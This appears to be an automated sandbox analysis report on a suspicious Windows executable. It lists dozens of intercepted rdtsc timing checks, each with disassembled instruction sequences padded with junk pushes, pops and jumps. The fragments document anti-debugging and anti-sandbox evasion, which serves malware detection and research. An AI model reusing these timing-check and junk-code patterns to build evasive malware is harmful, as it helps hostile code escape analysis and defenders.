                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9B58 second address: 4D9B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9B64 second address: 4D9B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9B6A second address: 4D9B7C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8F184B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9B7C second address: 4D9B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jmp 00007FE6E8B29091h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9B95 second address: 4D9B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9B9A second address: 4D9BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9D36 second address: 4D9D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007FE6E8F184B6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9E98 second address: 4D9E9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9E9E second address: 4D9EA3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4D9EA3 second address: 4D9EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4DA30A second address: 4DA345 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FE6E8F184C2h 0x00000012 pop eax 0x00000013 jmp 00007FE6E8F184BFh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE6E8F184BAh 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4DA345 second address: 4DA349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4DFABC second address: 4DFAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FE6E8F184B6h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E52D6 second address: 4E52FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E52FB second address: 4E5305 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E44C6 second address: 4E44CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E8F9A second address: 4E8F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E8F9E second address: 4E8FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE6E8B29095h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E8FB9 second address: 4E8FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E82C3 second address: 4E82C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E82C9 second address: 4E82D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE6E8F184B6h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E82D4 second address: 4E82DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E82DA second address: 4E830E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FE6E8F184C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E8478 second address: 4E847C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E847C second address: 4E84A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE6E8F184C3h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FE6E8F184BFh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E84A8 second address: 4E84B2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE6E8B29086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E84B2 second address: 4E84D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007FE6E8F184C1h 0x0000000f jl 00007FE6E8F184B6h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E84D8 second address: 4E84EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E84EB second address: 4E8501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8F184BCh 0x00000009 jg 00007FE6E8F184B6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E86D3 second address: 4E86D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E86D8 second address: 4E86E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E86E0 second address: 4E86E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E86E9 second address: 4E86ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E86ED second address: 4E86F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E8B4A second address: 4E8B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E8B4F second address: 4E8B5B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE6E8B2908Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E8CC8 second address: 4E8CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FE6E8F184B8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jc 00007FE6E8F184B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E8CE1 second address: 4E8CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E8CE7 second address: 4E8CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4E8E19 second address: 4E8E26 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8B29086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA381 second address: 4EA39F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FE6E8F184B6h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA39F second address: 4EA3A9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE6E8B29086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA3A9 second address: 4EA3B3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE6E8F184BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA3B3 second address: 4EA3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA3C3 second address: 4EA3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 jmp 00007FE6E8F184C8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA3EE second address: 4EA3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA3F2 second address: 4EA423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+122D2D4Ch] 0x0000000e call 00007FE6E8F184B9h 0x00000013 jmp 00007FE6E8F184C5h 0x00000018 push eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA423 second address: 4EA467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE6E8B29099h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d je 00007FE6E8B29086h 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007FE6E8B2908Fh 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA467 second address: 4EA46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA46B second address: 4EA475 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE6E8B29086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA8FE second address: 4EA90F instructions: 0x00000000 rdtsc 0x00000002 js 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EA90F second address: 4EA91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE6E8B29086h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EAB56 second address: 4EAB5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EAF44 second address: 4EAF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FE6E8B2908Ch 0x0000000f ja 00007FE6E8B29086h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EAF59 second address: 4EAF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EAF5F second address: 4EAF63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EAFE4 second address: 4EB02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 xchg eax, ebx 0x00000006 mov esi, dword ptr [ebp+122D2DB0h] 0x0000000c jl 00007FE6E8F184BCh 0x00000012 sub dword ptr [ebp+122D2862h], eax 0x00000018 nop 0x00000019 jmp 00007FE6E8F184C3h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FE6E8F184C9h 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EB385 second address: 4EB38B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EB38B second address: 4EB3A0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EB3A0 second address: 4EB3A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EB452 second address: 4EB456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EB456 second address: 4EB470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FE6E8B29088h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 je 00007FE6E8B29094h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EB470 second address: 4EB474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EBA9E second address: 4EBAA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EBAA2 second address: 4EBB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007FE6E8F184BBh 0x0000000d nop 0x0000000e pushad 0x0000000f or dword ptr [ebp+122D24D0h], ebx 0x00000015 mov bx, 2D17h 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FE6E8F184BEh 0x00000020 xor dword ptr [ebp+122D34F6h], eax 0x00000026 popad 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FE6E8F184B8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 push 00000000h 0x00000045 mov edi, dword ptr [ebp+122D2B7Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d jc 00007FE6E8F184BCh 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4ED4A1 second address: 4ED4A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4ED4A5 second address: 4ED4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FE6E8F184C8h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FE6E8F184BCh 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4ED4D5 second address: 4ED4DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FE6E8B29086h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EDF95 second address: 4EDF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EDC89 second address: 4EDC8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EE889 second address: 4EE89B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FE6E8F184B6h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EE89B second address: 4EE8D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d xor esi, dword ptr [ebp+122D2A24h] 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 mov dword ptr [ebp+122D2A2Dh], edi 0x0000001c stc 0x0000001d popad 0x0000001e push 00000000h 0x00000020 mov edi, dword ptr [ebp+122D2EA0h] 0x00000026 push eax 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EE8D6 second address: 4EE8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EF113 second address: 4EF119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4EFF5E second address: 4EFF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F091F second address: 4F0925 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F0925 second address: 4F092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F474C second address: 4F4751 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F1153 second address: 4F1158 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F4E59 second address: 4F4E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F5FC0 second address: 4F5FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FA26F second address: 4FA27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F4F6A second address: 4F4F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FA27A second address: 4FA285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4F4F6E second address: 4F4F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FA285 second address: 4FA2F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FE6E8B29097h 0x0000000d mov dword ptr [ebp+122D36B7h], esi 0x00000013 push 00000000h 0x00000015 call 00007FE6E8B29094h 0x0000001a pushad 0x0000001b movsx eax, bx 0x0000001e mov ax, B2BFh 0x00000022 popad 0x00000023 pop ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007FE6E8B29088h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov ebx, dword ptr [ebp+122D32CCh] 0x00000046 push eax 0x00000047 push edi 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FA45E second address: 4FA470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
